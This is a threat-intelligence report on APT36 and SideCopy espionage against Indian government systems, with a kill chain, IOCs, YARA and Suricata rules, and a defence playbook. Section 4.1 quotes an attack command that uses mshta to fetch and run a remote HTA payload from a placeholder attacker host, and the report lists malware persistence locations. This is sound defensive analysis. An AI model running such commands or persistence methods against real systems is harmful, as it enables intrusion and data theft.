HomeAdvantageCitadelServicesLive IntelInsightsAboutBook a Briefing
Home / Insights / Insight
Insight27 Mar 202613 min read

APT36, SideCopy &The #Pakistan Ghost in the #Bharat Machine – A Deep-Dive, Strictly for Exploit-Enthusiasts – #DhananjayRokde #iManEdge

► THREAT INTELLIGENCE REPORT — TLP:AMBER — RESTRICTED DISTRIBUTION

CSOC ADVISORY // INDIA-PAKISTAN CYBER CONFLICT // MARCH 2026

APT36, SideCopy &
The Ghost in the Machine

A forensic dismantling of Pakistan-aligned state-sponsored espionage against Indian Critical Information Infrastructure — kill chains, full IOC tables, MITRE ATT&CK mapping, YARA/Suricata rules, and a brutal autopsy of why Indian CSOCs keep failing.

// Report Date: 22 March 2026
// Threat Groups: APT36 · SideCopy · Transparent Tribe
// Target: India (GOI · MOD · CII · STARTUP SUPPLY CHAIN)
// Confidence: HIGH

// Table of Contents

  1. Threat Actor Profile: Unmasking the Apparatus
  2. The Numbers: Operation Sindoor & Campaign Statistics
  3. Full Arsenal Breakdown: Every Weapon in the Toolkit
  4. Unified Kill Chain — Step-by-Step Technical Anatomy
  5. Honey Trap & Social Engineering: The Unpatchable Vector
  6. Technical Deep Dive: Limepad, DeskRAT & Geta RAT
  7. C2 Infrastructure Analysis & Network Fingerprinting
  8. IOC Tables: Hashes, Domains, IPs, YARA & Suricata Rules
  9. Indicators of Attack (IOA) — Behavioural Detection Logic
  10. CSOC Failure Analysis: Why Defenses Keep Collapsing
  11. Supply Chain Pivot: Startups as the New Attack Surface
  12. Strategic Defense Playbook: Zero Trust to Agentic AI

01 Threat Actor Profile: Unmasking the Apparatus

APT36 — also catalogued as Transparent Tribe, Mythic Leopard, ProjectM, COPPER FIELDSTONE, and Earth Karkaddan — is a Pakistan-aligned Advanced Persistent Threat group assessed with high confidence to be sponsored by Pakistan’s Inter-Services Intelligence (ISI). Active since at least 2013, it represents the most persistent state-aligned cyber-espionage threat operating against Indian sovereign interests.

SideCopy is a closely affiliated sub-cluster, active since 2019, assessed to operate as a subordinate division within the Transparent Tribe umbrella. Infrastructure reuse and shared code in stager payloads confirm the operational overlap.

// ANALYST NOTE — ATTRIBUTION CONFIDENCE

Attribution evidence includes: C2 infrastructure resolving to AS numbers linked to Pakistan mobile data operators (Asia/Karachi timezone), VHDX payload metadata containing Pakistan PM Youth Laptop Scheme device fingerprints, hardcoded hex-encoded string “india” (DUSSEN field in Limepad config) for targeting verification, and domain registration patterns using Pakistani registrars.

Threat Actor Comparison Matrix

Attribute APT36 (Transparent Tribe) SideCopy
Alias cluster Mythic Leopard, ProjectM, COPPER FIELDSTONE, Earth Karkaddan SubK, Operation C-Major affiliate
Active since 2013 2019
Platform focus Linux (BOSS OS), Android, Windows Windows primary, expanding Linux
Primary languages Python, Golang, .NET, Rust .NET, C++, PowerShell
Flagship malware CrimsonRAT, DeskRAT, Limepad, ElizaRAT, CapraRAT CurlBack RAT, Spark RAT, CetaRAT, AllaKore RAT, ActionRAT
Motivation Long-term strategic intelligence gathering Intelligence + credential collection for subsequent ops

02 The Numbers: Operation Sindoor & Campaign Statistics

650+ DDoS/Defacement events May 7–10, 2025 35 Hacktivist groups coordinated; 7 newly emerged 4,000+ Incidents logged ahead of Independence Day Aug 2025 13+ Years APT36 has been active against Indian targets 20+ Commands executable via CrimsonRAT on infected host 60MB+ VHDX container size used to evade email size filters

Campaign Timeline: Key Escalation Points (2024–2026)

AUG 2022

Limepad v0.1 First Observed (Zscaler)

New Python/PyInstaller exfiltration tool deployed inside VHDX containers targeting Kavach MFA users. Config field DUSSEN contains hex-encoded “india” as targeting geocheck. SQLite-based file sync mechanism for continuous exfiltration.

DEC 2023 – 2025

Mass NIC Spoofing Campaign

APT36 spoofs @nic.in email infrastructure to deliver payloads to high-ranking bureaucrats. Campaign spans 18+ months targeting India’s National Informatics Centre identity. Payloads include updated CrimsonRAT variants and malicious PPAM/XLAM macro files.

APR 22, 2025

Pahalgam Attack — Weaponized Within Hours

APT36 weaponizes the Pahalgam terror attack as phishing lure within 48 hours. PDFs distributed linking to spoofed J&K Police and Indian Air Force credential portals. CrimsonRAT delivered to defense and government personnel.

MAY 7, 2025

Operation Sindoor — Multi-Vector National Assault

APT36 + SideCopy + 35 hacktivist groups (Telegram-coordinated under #OpIndia) launch simultaneous espionage, DDoS, and defacement. Targets: MoD, NIC, GSTN, AIIMS, Jio, BSNL. 650+ DDoS/defacement events in 72 hours. Deceptive domains pahalgamattackcom and operationsindoor2025in registered.

JUL–SEP 2025

DeskRAT / StealthServer — Linux Cross-Platform Campaign

Sekoia and QiAnXin XLab document new Golang-based DeskRAT targeting BOSS Linux (India’s government OS). Three StealthServer variants (V1–V3) evolve from TCP to WebSocket C2 within weeks. C2 at modgovindiacom / modgovindiaspace:4000 — stealth DNS with no public NS records.

JAN–FEB 2026

Geta RAT + Ares RAT Cross-Platform Campaign (Aryaka)

Simultaneous Windows (Geta RAT) and Linux (Ares RAT via Go stager) campaigns using identical decoy documents. Geta RAT adapts its persistence method based on installed security products — first documented AV-aware persistence selection in APT36’s toolkit.

03 Full Arsenal Breakdown: Every Weapon in the Toolkit

The APT36/SideCopy toolset has expanded dramatically from CrimsonRAT’s .NET roots into a multi-language, multi-platform ecosystem. The shift to Golang and Rust is deliberate: compiled Go/Rust binaries strip debug symbols, frustrate static analysis, and produce cross-platform payloads from a single codebase.

// KEY INSIGHT — THE BOSS OS TARGETING

Bharat Operating System Solutions (BOSS Linux) is India’s sovereign government-issued Linux distribution. APT36’s DeskRAT, Poseidon, and Ares RAT Linux variants are explicitly engineered to target this platform — evidenced by ‘bossupdate’ naming conventions and the ‘start_collection’ command that recursively sweeps from root (/). If your ministry runs BOSS, assume you are a named target in their operational orders.

Tool Group Lang / Platform Key Capabilities Status
CrimsonRAT APT36 .NET / Win Keylog, screenshot, dir enum, file steal, 20+ commands, HTTP/HTTPS C2 Active
DeskRAT APT36 Golang / Linux (BOSS) 4 simultaneous persistence vectors, WebSocket C2, file collection by extension from /, start_collection cmd Active 2025–26
StealthServer APT36 Golang / Win + Linux V1: anti-debug, TCP; V2: new anti-debug; V3: WebSocket. Unifies Win/Linux tactics Active 2025
Limepad APT36 Python / Win SQLite file-sync, India TZ geocheck (hex “india”), multi-C2 failover, VHDX delivery Confirmed
CapraRAT APT36 Java / Android SMS intercept, call record, location, camera/mic, WhatsApp exfil Active
Geta RAT APT36 / SideCopy .NET / Win AV detection → adaptive persistence, USB harvest, credential steal, clipboard replace Active 2025–26
CurlBack RAT SideCopy C++ / Win Uses legitimate curl library for HTTPS comms, Railways/MEA sector targeting Confirmed 2024–25
Spark RAT SideCopy Golang / Cross-platform Windows + Linux + macOS, WebSocket C2, full command execution Confirmed 2024

04 Unified Kill Chain — Step-by-Step Technical Anatomy

PHASE 1 — RECONNAISSANCE

OSINT harvest · SOCMINT (LinkedIn / Facebook / WhatsApp) · Honey trap persona build · Kavach / NIC portal recon · India-timezone targeting verification

↓ PHASE 2 — WEAPONIZATION

LNK / HTA / ISO / VHDX crafting · CrimsonRAT .NET compile · Golang DeskRAT build · ClickFix PDF prep · APK trojanization (CapraRAT)

↓ PHASE 3 — DELIVERY

Spear-phish (NIC / MoD spoof) · Malvertising (Google Ads) · WhatsApp / Telegram RAT drop · ZIP / ISO / VHDX archives · .desktop Linux file · PPAM macro · WinRAR CVE-2023-38831

↓ PHASE 4 — EXPLOITATION & EXECUTION

mshta.exe HTA exec · CVE-2023-38831 WinRAR · ClickFix PowerShell drop · Base64+XOR in-memory decode · IsDebuggerPresent / IsWow64Process anti-analysis · ReadOnly/.NET deser bypass

↓ PHASE 5 — INSTALLATION & PERSISTENCE

Registry Run keys · Cron jobs / systemd (BOSS Linux) · Startup shortcut (Limepad.dll) · DeskRAT: 4 persistence vectors simultaneously · Scheduled tasks · Shell profile .bashrc injection

↓ PHASE 6 — C2 COMMUNICATION

Google Drive / Slack / Discord · WebSocket (DeskRAT / StealthServer) · Telegram Bot API · Stealth DNS (no public NS records) · Contabo / Hostinger infra · AS / Karachi TZ fingerprint

↓ PHASE 7 — LATERAL MOVEMENT & DISCOVERY

Geta RAT process enum · Credential harvest (browser / Kavach) · USB data harvest · Dir / file enumeration (T1083) · AV-aware persistence adaptation

↓ PHASE 8 — EXFILTRATION & IMPACT

Limepad SQLite file sync · Screenshot / keylog stream · DeskRAT start_collection cmd · India TZ check (hex “india”) · HTTP POST Python-urllib · Encrypted exfil over HTTPS to modgovindiaspace:4000

4.1 — The LNK Weapon: Anatomy of a 2MB Shortcut

One of the most technically elegant evasion techniques documented in December 2025 campaigns is the weaponized LNK file. Windows hides .lnk extensions by default. Inside the LNK, the full decoy PDF is embedded as binary data — it extracts and opens the PDF while the malicious chain executes invisibly in the background.

// 1. User receives: "Online JLPT Exam Dec 2025.zip"
// 2. Extracts to:   "Online JLPT Exam Dec 2025.pdf"  <- .lnk hidden by Windows
// 3. Opens file -> LNK executes:

cmd.exe /c mshta.exe https://attacker-c2domain/payload.hta

// 4. HTA performs multi-stage in-memory decode:
HTA -> Base64 decode -> XOR decrypt -> load ReadOnly (.NET deser bypass)
HTA -> Drop + exec WriteOnly.dll (359KB RAT - iinneldc.dll)
// 5. Decoy PDF opens in user's default viewer - suspicion neutralized
// 6. RAT establishes persistence in Windows Registry / Startup
// 7. C2 beacon sent via HTTPS to stealth-DNS server

4.2 — DeskRAT Persistence Matrix (4 Simultaneous Vectors)

Persistence Vector Location MITRE
Cron job /var/spool/cron/crontabs/ T1053.003
Systemd service /etc/systemd/system/.service T1543.002
Shell profile injection ~/.bashrc or ~/.bash_profile T1546.004
Autostart directory ~/.config/autostart/.desktop T1547.013

08 IOC Tables: Hashes, Domains, IPs, YARA & Suricata Rules

// DISCLAIMER — OPERATIONAL SECURITY

IOCs have limited shelf life. Consume as hunting seeds and behavioral baselines, not static blocklists. Domains presented in defanged format — re-fang before operationalizing.

8.1 — File Hashes (SHA-256)

SHA-256 Family Source
f03ac870cb91c00b51ddf29b6028d9ddf42477970eafa7c556e3a3d74ada25c9 CrimsonRAT CYFIRMA Jun 2025
55b7e20e42b57a32db29ea3f65d0fd2b2858aaeb9307b0ebbcdad1b0fcfd8059 CrimsonRAT CYFIRMA Jun 2025
55972edf001fd5afb1045bd96da835841c39fec4e3d47643e6a5dd793c904332 Limepad loader CYFIRMA Jun 2025

8.2 — Malicious Domains (Defanged)

Domain Role Hosting
modgovindiacom DeskRAT payload staging + C2 Hostinger
modgovindiaspace DeskRAT C2 :4000 WebSocket Hostinger
emailgovingov-inmywireorg CrimsonRAT C2 / credential harvest Contabo
pahalgamattackcom OpSindoor phishing / psyops Various
gov-inmywireorg CapraRAT / APK distribution Dynamic DNS

8.3 — YARA Detection Rules

// YARA Rule - Limepad Exfiltration Tool
rule APT36_Limepad_Exfil_Tool {
  meta:
    author      = "ThreatIntel - APT36 Tracker"
    description = "Detects Limepad exfiltration tool targeting Indian GOI"
    date        = "2025-06-01"
    mitre       = "T1041, T1082, T1547.009"

  strings:
    $s1 = "Limepad.db"        ascii wide
    $s2 = "696e646961"       ascii  /* hex("india") - DUSSEN geocheck */
    $s3 = "SYNC_RULES_CONFIG" ascii wide
    $s4 = "Python-urllib"     ascii wide
    $s5 = "Auth_Token"        ascii wide
    $s6 = "DUSSEN"            ascii wide
    $pyinst = "PyInstaller"     ascii wide

  condition:
    (uint16(0) == 0x5A4D or uint16(0) == 0x4B50) and
    (($s1 and $s2) or ($s3 and $s4) or (3 of ($s1,$s2,$s3,$s4,$s5,$s6)))
    and $pyinst
}

rule APT36_DeskRAT_Golang_Linux {
  meta:
    description = "DeskRAT Golang Linux backdoor targeting BOSS OS"
    reference   = "Sekoia Oct 2025, QiAnXin XLab Oct 2025"

  strings:
    $go_magic  = { 47 6F 20 62 75 69 6C 64 }  /* "Go build" */
    $ws_proto  = "websocket"          ascii nocase
    $cmd1      = "start_collection"   ascii
    $c2_domain = "modgovindia"        ascii nocase
    $boss_ref  = "bossupdate"         ascii nocase

  condition:
    uint32(0) == 0x464C457F and  /* ELF magic */
    $go_magic and ($cmd1) and ($c2_domain or $boss_ref)
}

8.4 — Suricata IDS/IPS Rules

-- Limepad Initial Check-in (GET with custom headers)
alert http any any -> any any (
  msg:"APT36.Limepad Initial Checkin Request";
  flow:established,to_server;
  http.method; content:"GET";
  http.header_names; content:"Username";
  http.header_names; content:"Auth_Token";
  http.user_agent; content:"Python-urllib"; fast_pattern; startswith;
  classtype:trojan-activity; sid:9001; rev:1;
)

-- DeskRAT C2 - non-standard port WebSocket
alert tcp any any -> any 4000 (
  msg:"APT36.DeskRAT C2 WebSocket Port 4000";
  flow:established,to_server;
  content:"GET /"; depth:6;
  content:"Upgrade: websocket"; nocase;
  pcre:"/Host:\s*(modgovindia|gov-in\.mywire)/i";
  classtype:trojan-activity; sid:9010; rev:1;
)

-- ClickFix mshta.exe Remote HTA Pattern
alert dns any any -> any any (
  msg:"APT36.ClickFix Remote HTA Domain Pattern";
  dns.query; content:"mywire.org"; endswith;
  pcre:"/gov?in.*mywire\.org/i";
  classtype:bad-unknown; sid:9015; rev:1;
)

09 Indicators of Attack (IOA) — Behavioural Detection Logic

IOCs die. IOAs survive. A file hash becomes stale the moment the attacker recompiles. Behavioural IOAs detect the technique, not the implementation. This is where durable detection lives.

# IOA Behavioural Pattern MITRE Priority
F01 mshta.exe spawning from non-browser process T1218.005 CRITICAL
F02 Python-urllib beacon from non-developer host T1041 CRITICAL
F03 LNK file >100KB in email attachment T1204.002 CRITICAL
F04 Golang ELF recursively scanning from / by extension T1083 CRITICAL
F05 4 simultaneous persistence mechanisms created T1053.003 + T1543.002 + T1546.004 CRITICAL
F06 Non-browser process calling Google Drive / Slack API from server T1102 CRITICAL
F07 Outbound TCP/WSS on port 4000 T1095 HIGH
F08 User-executed clipboard paste → Run dialog → PowerShell -EncodedCommand T1204.002 (ClickFix) HIGH

10 CSOC Failure Analysis: Why Defenses Keep Collapsing

Compliance is the theater of security. APT36 does not present its credentials at the gate — it never uses the gate at all.

— SOC failure analysis framework F01 Signature-Based Detection Ineffectiveness Against Golang/Rust Payloads

APT36’s DeskRAT, StealthServer, and Spark RAT are written in Golang. Compiled Go binaries strip symbols and produce 10MB+ executables sharing minimal static features between compilations. Hash-based detection has 0% hit rate against novel Go binaries. The Geta RAT specifically enumerates installed AV/EDR before selecting its persistence mechanism — it is designed to understand your detection stack.

F02 TLS Blindspot — C2 Traffic Over Encrypted Channels

When CrimsonRAT or ElizaRAT uses the Google Drive API for C2, traffic exits the network over TLS 1.3 to 142.250.x.x (Google IP space). Without TLS inspection (SSL MITM), the SOC sees only “encrypted traffic to Google.” Most Indian government network segments do not implement TLS inspection due to certificate management complexity. APT36 knows this. They bank on it.

F03 Perimeter-Only Visibility — Zero Internal East-West Telemetry

Standard CSOC architecture monitors ingress/egress firewalls and email gateways only. Once APT36 establishes initial access, they have cleared the border. Internal east-west traffic — lateral movement, credential reuse, RDP pivoting — generates zero alerts because there is no east-west monitoring. DeskRAT’s recursive sweep from root (/) to exfiltrate files never crosses a monitored boundary.

F04 SIEM False-Positive Tsunami — Alert Fatigue as a Weapon

Typical Indian government SIEM deployments generate 2–5 million events per day with alert-to-investigation ratios exceeding 100:1. APT36 exploits this deliberately: their C2 traffic and exfiltration events are specifically designed to look like low-severity noise — a Python process making HTTP calls, a cron job running, a file being copied. Their malicious nature only emerges through behavioral correlation across multiple telemetry sources.

F05 Linux / BOSS OS Blind Spots

Enterprise EDR solutions are overwhelmingly designed for Windows. Linux server monitoring in Indian government environments is sparse — typically limited to syslog forwarding with no behavioral agent. DeskRAT’s four-vector persistence on BOSS Linux will generate no alert in a Windows-centric EDR deployment. Ares RAT can operate on back-end servers for months without triggering a single alert in a standard SOC stack.

F06 Compliance Theater — ISO 27001 / CERT-In Checkbox Syndrome

ISO 27001 certification requires documented controls and annual audits — not threat hunting, not behavioral analytics, not red team exercises against APT-simulated attacks. CISOs spending 80% of their time on compliance paperwork optimize for audit scores while the adversary optimizes for persistence. The 6-hour CERT-In mandatory reporting window becomes moot if your SOC cannot detect a Limepad exfiltration that has been running for months.

CSOC Detection Coverage vs APT36 Attack Vectors

Phishing / Email Lure Detection62% Windows Signature-Based EDR55% Behavioural IOA Detection35% Linux / BOSS OS Monitoring18% C2 via Telegram / Slack / Google Drive12% Android / Mobile Surveillance (CapraRAT)8% Supply Chain / Third-Party Monitoring5% HUMINT / Honey Trap Detection3%

12 Strategic Defense Playbook: Zero Trust to Agentic AI

12.1 — Immediate Actions (0–30 Days)

Action Target Defeats
Block outbound port 4000 on all government segments Firewall / NGFW DeskRAT C2
Alert on Python-urllib User-Agent from non-developer hosts Proxy / SIEM Limepad beaconing
Email gateway: LNK attachments >50KB = quarantine Email security Weaponized LNK chain
Alert on mshta.exe with remote URL argument EDR / Windows Defender ASR HTA execution chain
Deploy FIDO2 hardware keys for all NIC / government email accounts Identity / IAM Fake Kavach portals, credential theft
Block api.telegram.org, discord.com from server network segments Egress firewall C2 over legitimate services
Block Contabo AS197414 and Hostinger AS47172 via TI feed Firewall / TI feed Dedicated C2 VPS

// REGULATORY CONTEXT — DPDPA 2023 + CERT-IN 6-HOUR WINDOW

India’s Digital Personal Data Protection Act 2023 is live and enforced. Any APT36 compromise of HR databases (for honey trap profiling), employee credential stores, or citizen data is a mandatory reportable breach. The CERT-In 6-hour reporting window means your SOC must detect, triage, and report within 6 hours of occurrence. DPDPA penalties and executive personal liability provisions make this a board-level risk, not an IT problem.

// Intelligence Sources

  • ▪ Seqrite Labs APT-Team — Operation Sindoor analysis, SideCopy multi-platform campaigns
  • ▪ CYFIRMA — APT36 profile, ClickFix analysis, YARA rules, DeskRAT campaign (Jun 2025)
  • ▪ Cisco Talos — InSideCopy detailed malware analysis
  • ▪ Zscaler ThreatLabz — Limepad first disclosure, Kavach malvertising
  • ▪ Sekoia — DeskRAT Golang campaign, stealth DNS analysis (Oct 2025)
  • ▪ QiAnXin XLab — StealthServer V1-V3 analysis (Oct 2025)
  • ▪ Aryaka Security — Geta RAT + Ares RAT cross-platform campaign (Feb 2026)
  • ▪ SOCRadar — APT36 dark web profile, historical campaigns
  • ▪ AttackIQ — Limepad attack graph, Suricata rules, MITRE mapping
  • ▪ CloudSEK — India Independence Day threat analysis (Aug 2025)
  • ▪ The Hacker News — Cross-platform espionage campaign coverage (Feb 2026)

TLP:AMBER — RESTRICTED // Report Date: 22 March 2026 // For authorized cybersecurity professionals only

Originally published on dhananjayrokde.wordpress.com · reproduced in full.

← OlderThe Dirty Deputy Problem: How McKinsey’s AI Became a legend in Enterprise Vulnerability – Are the Big4s next? (My money is on the Ugly Green Dot) – #DhananjayRokdeNewer →When Risk Advisors Get Breached: The Identity Failures Behind the LexisNexis Hack – #DhananjayRokde
Engage iManEdge

More from the journal.

Read the latest field notes, or bring this intelligence in-house.

Book a Briefing

Securing Bharat, in your inbox.

Field-grade threat analysis, DPDP updates and Citadel releases — from a practising CISO. No noise.